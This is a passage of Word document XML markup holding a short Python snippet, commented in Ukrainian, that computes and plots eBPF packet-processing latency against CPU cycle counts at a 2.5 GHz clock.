          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>np.linspace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(1000, 10000, 100)  # </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Кількість</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>тактів</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="0024039E" w:rsidRPr="003C7FE5" w:rsidRDefault="0024039E" w:rsidP="0024039E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 2.5</w:t>
      </w:r>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">9  # </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>Тактова</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> частота в Гц (2.5 </w:t>
      </w:r>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GHz</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0024039E" w:rsidRPr="003C7FE5" w:rsidRDefault="0024039E" w:rsidP="0024039E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0024039E" w:rsidRPr="003C7FE5" w:rsidRDefault="0024039E" w:rsidP="0024039E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>Обчислення</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>затримки</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="0024039E" w:rsidRPr="003C7FE5" w:rsidRDefault="0024039E" w:rsidP="0024039E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">  # час </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>обробки</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> (с)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0024039E" w:rsidRPr="003C7FE5" w:rsidRDefault="0024039E" w:rsidP="0024039E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0024039E" w:rsidRPr="003C7FE5" w:rsidRDefault="0024039E" w:rsidP="0024039E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>Побудова</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>графіку</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="0024039E" w:rsidRPr="003C7FE5" w:rsidRDefault="0024039E" w:rsidP="0024039E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>plt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>plot</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> * 1</w:t>
      </w:r>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">6)  # </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>Перетворюємо</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> на </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>мікросекунди</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="0024039E" w:rsidRPr="003C7FE5" w:rsidRDefault="0024039E" w:rsidP="0024039E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>plt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>Затримка</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>обробки</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> пакета </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>залежно</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>від</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>кількості</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>тактів</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>процесора</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0024039E" w:rsidRPr="003C7FE5" w:rsidRDefault="0024039E" w:rsidP="0024039E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>plt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xlabel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>Кількість</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>тактів</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> на пакет (</w:t>
      </w:r>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>)')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0024039E" w:rsidRPr="003C7FE5" w:rsidRDefault="0024039E" w:rsidP="0024039E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>plt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0024039E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ylabel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>Затримка</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>мкс</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
